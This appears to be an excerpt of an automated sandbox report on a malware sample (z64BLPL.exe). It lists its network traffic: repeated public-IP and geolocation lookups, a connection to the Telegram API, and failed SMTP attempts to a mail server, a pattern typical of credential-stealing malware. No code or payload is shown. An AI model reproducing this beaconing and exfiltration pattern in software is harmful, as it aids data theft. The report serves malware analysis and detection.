                                                        Sep 26, 2024 17:09:58.211630106 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:09:58.211724043 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:09:58.211992025 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:09:58.217827082 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:09:58.880146980 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:09:58.885175943 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:09:58.895159960 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:09:59.077944040 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:09:59.130991936 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:09:59.139976025 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:09:59.139998913 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:09:59.140070915 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:09:59.149842024 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:09:59.149857044 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:09:59.654016018 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:09:59.654151917 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:09:59.660387993 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:09:59.660410881 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:09:59.660840034 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:09:59.709083080 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:00.183356047 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:00.223400116 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:00.309858084 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:00.309971094 CEST44349731188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:00.310082912 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:00.317410946 CEST49731443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:00.320966005 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:00.326773882 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:00.527089119 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:00.531579018 CEST49732443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:00.531611919 CEST44349732188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:00.531682968 CEST49732443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:00.532172918 CEST49732443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:00.532185078 CEST44349732188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:00.568500042 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:01.030261040 CEST44349732188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:01.032318115 CEST49732443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:01.032335043 CEST44349732188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:01.211050987 CEST44349732188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:01.211169004 CEST44349732188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:01.211317062 CEST49732443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:01.211633921 CEST49732443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:01.214828014 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:01.215993881 CEST4973380192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:01.220967054 CEST8049730193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:01.220978975 CEST8049733193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:01.221060038 CEST4973080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:01.221093893 CEST4973380192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:01.221191883 CEST4973380192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:01.226352930 CEST8049733193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:22.602520943 CEST8049733193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:22.605931044 CEST4973380192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:22.612098932 CEST4973380192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:22.614058018 CEST4974080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:22.616991043 CEST8049733193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:22.619029045 CEST8049740193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:22.622540951 CEST4974080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:22.622690916 CEST4974080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:22.627482891 CEST8049740193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:31.285698891 CEST8049740193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:31.287059069 CEST49741443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:31.287173033 CEST44349741188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:31.287324905 CEST49741443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:31.287621021 CEST49741443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:31.287658930 CEST44349741188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:31.334224939 CEST4974080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:31.755745888 CEST44349741188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:31.765150070 CEST49741443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:31.765259027 CEST44349741188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:31.907733917 CEST44349741188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:31.907836914 CEST44349741188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:31.907913923 CEST49741443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:31.908370972 CEST49741443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:31.911853075 CEST4974080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:31.912946939 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:31.916982889 CEST8049740193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:31.917054892 CEST4974080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:31.917776108 CEST8049742193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:31.917862892 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:31.917932987 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:31.922975063 CEST8049742193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:35.905607939 CEST8049742193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:35.905626059 CEST8049742193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:35.905706882 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:35.914891958 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:35.919748068 CEST8049742193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:36.537620068 CEST8049742193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:36.538822889 CEST49743443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:36.538867950 CEST44349743188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:36.538954020 CEST49743443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:36.539254904 CEST49743443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:36.539269924 CEST44349743188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:36.584155083 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:37.010214090 CEST44349743188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:37.017998934 CEST49743443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:37.018044949 CEST44349743188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:37.160572052 CEST44349743188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:37.160738945 CEST44349743188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:37.160809040 CEST49743443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:37.161380053 CEST49743443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:37.164859056 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:37.166100025 CEST4974480192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:37.170149088 CEST8049742193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:37.170243025 CEST4974280192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:37.170954943 CEST8049744193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:37.171041012 CEST4974480192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:37.171185017 CEST4974480192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:37.176091909 CEST8049744193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:38.807979107 CEST8049744193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:38.809443951 CEST49745443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:38.809549093 CEST44349745188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:38.809798956 CEST49745443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:38.809967995 CEST49745443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:38.810002089 CEST44349745188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:38.849812984 CEST4974480192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:39.333060980 CEST44349745188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:39.335103035 CEST49745443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:39.335130930 CEST44349745188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:39.473113060 CEST44349745188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:39.473263979 CEST44349745188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:39.473336935 CEST49745443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:39.473687887 CEST49745443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:39.476654053 CEST4974480192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:39.478049040 CEST4974680192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:39.482548952 CEST8049744193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:39.482614994 CEST4974480192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:39.483913898 CEST8049746193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:39.483997107 CEST4974680192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:39.484121084 CEST4974680192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:39.490559101 CEST8049746193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:42.134253025 CEST8049746193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:42.135741949 CEST49747443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:42.135843992 CEST44349747188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:42.136008024 CEST49747443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:42.136239052 CEST49747443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:42.136271000 CEST44349747188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:42.177920103 CEST4974680192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:42.643096924 CEST44349747188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:42.644798994 CEST49747443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:42.644854069 CEST44349747188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:42.866292000 CEST44349747188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:42.866406918 CEST44349747188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:42.866473913 CEST49747443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:42.870654106 CEST49747443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:42.899295092 CEST4974680192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:42.900207043 CEST4974880192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:42.940862894 CEST8049748193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:42.940983057 CEST4974880192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:42.941111088 CEST4974880192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:42.943008900 CEST8049746193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:42.943085909 CEST4974680192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:42.956279039 CEST8049748193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:43.617235899 CEST8049748193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:43.618619919 CEST49749443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:43.618662119 CEST44349749188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:43.618773937 CEST49749443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:43.619131088 CEST49749443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:43.619144917 CEST44349749188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:43.662331104 CEST4974880192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:44.142925024 CEST44349749188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:44.144808054 CEST49749443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:44.144829035 CEST44349749188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:44.323335886 CEST44349749188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:44.323504925 CEST44349749188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:44.323589087 CEST49749443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:44.324064970 CEST49749443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:44.327312946 CEST4974880192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:44.328552008 CEST4975080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:44.332680941 CEST8049748193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:44.332761049 CEST4974880192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:44.334686041 CEST8049750193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:44.334762096 CEST4975080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:44.334860086 CEST4975080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:44.340409040 CEST8049750193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:45.045376062 CEST8049750193.122.6.168192.168.2.4
                                                        Sep 26, 2024 17:10:45.047786951 CEST49751443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:45.047904015 CEST44349751188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:45.047998905 CEST49751443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:45.048367023 CEST49751443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:45.048402071 CEST44349751188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:45.099812031 CEST4975080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:45.560137033 CEST44349751188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:45.561798096 CEST49751443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:45.561867952 CEST44349751188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:45.708945990 CEST44349751188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:45.709058046 CEST44349751188.114.97.3192.168.2.4
                                                        Sep 26, 2024 17:10:45.709111929 CEST49751443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:45.709484100 CEST49751443192.168.2.4188.114.97.3
                                                        Sep 26, 2024 17:10:45.730833054 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:45.730907917 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:45.730979919 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:45.731292009 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:45.731328964 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:46.371262074 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:46.371479988 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:46.374813080 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:46.374833107 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:46.375344992 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:46.376605034 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:46.423396111 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:46.663913965 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:46.663986921 CEST44349752149.154.167.220192.168.2.4
                                                        Sep 26, 2024 17:10:46.664156914 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:46.664468050 CEST49752443192.168.2.4149.154.167.220
                                                        Sep 26, 2024 17:10:51.925179005 CEST4975080192.168.2.4193.122.6.168
                                                        Sep 26, 2024 17:10:52.379081011 CEST4975325192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:10:53.381150007 CEST4975325192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:10:55.396852970 CEST4975325192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:10:59.412341118 CEST4975325192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:11:07.412394047 CEST4975325192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:11:14.947559118 CEST4975525192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:11:15.959227085 CEST4975525192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:11:17.959270000 CEST4975525192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:11:21.959280014 CEST4975525192.168.2.4192.250.231.25
                                                        Sep 26, 2024 17:11:29.959240913 CEST4975525192.168.2.4192.250.231.25
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 26, 2024 17:09:58.093405008 CEST5868653192.168.2.41.1.1.1
                                                        Sep 26, 2024 17:09:58.199585915 CEST53586861.1.1.1192.168.2.4
                                                        Sep 26, 2024 17:09:59.125065088 CEST5565753192.168.2.41.1.1.1
                                                        Sep 26, 2024 17:09:59.139177084 CEST53556571.1.1.1192.168.2.4
                                                        Sep 26, 2024 17:10:45.722960949 CEST4931853192.168.2.41.1.1.1
                                                        Sep 26, 2024 17:10:45.730357885 CEST53493181.1.1.1192.168.2.4
                                                        Sep 26, 2024 17:10:52.313168049 CEST5436353192.168.2.41.1.1.1
                                                        Sep 26, 2024 17:10:52.378348112 CEST53543631.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 26, 2024 17:09:58.093405008 CEST192.168.2.41.1.1.10x28d5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:09:59.125065088 CEST192.168.2.41.1.1.10x4664Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:10:45.722960949 CEST192.168.2.41.1.1.10x7b48Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:10:52.313168049 CEST192.168.2.41.1.1.10x61ddStandard query (0)mail.electradubai.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 26, 2024 17:09:58.199585915 CEST1.1.1.1192.168.2.40x28d5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 17:09:58.199585915 CEST1.1.1.1192.168.2.40x28d5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:09:58.199585915 CEST1.1.1.1192.168.2.40x28d5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:09:58.199585915 CEST1.1.1.1192.168.2.40x28d5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:09:58.199585915 CEST1.1.1.1192.168.2.40x28d5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:09:58.199585915 CEST1.1.1.1192.168.2.40x28d5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:09:59.139177084 CEST1.1.1.1192.168.2.40x4664No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:09:59.139177084 CEST1.1.1.1192.168.2.40x4664No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:10:45.730357885 CEST1.1.1.1192.168.2.40x7b48No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 17:10:52.378348112 CEST1.1.1.1192.168.2.40x61ddNo error (0)mail.electradubai.com192.250.231.25A (IP address)IN (0x0001)false
                                                        • reallyfreegeoip.org
                                                        • api.telegram.org
                                                        • checkip.dyndns.org
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449730193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:09:58.211992025 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Sep 26, 2024 17:09:58.880146980 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:09:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: c7ec0746c706975a27626e908c41cf88
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                        Sep 26, 2024 17:09:58.885175943 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:09:59.077944040 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:09:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: e2d471029d84583ab5ea3172f41d4456
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                        Sep 26, 2024 17:10:00.320966005 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:00.527089119 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 5575a820128f7002d0208294c3812756
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449733193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:10:01.221191883 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449740193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:10:22.622690916 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:31.285698891 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: f7447a85838b06fac8a6cf5f4ea0eabc
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449742193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:10:31.917932987 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:35.905607939 CEST745INHTTP/1.1 504 Gateway Time-out
                                                        Date: Thu, 26 Sep 2024 15:10:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 557
                                                        Connection: keep-alive
                                                        X-Request-ID: 5becb1b1d69e925157ce1b7151665f46
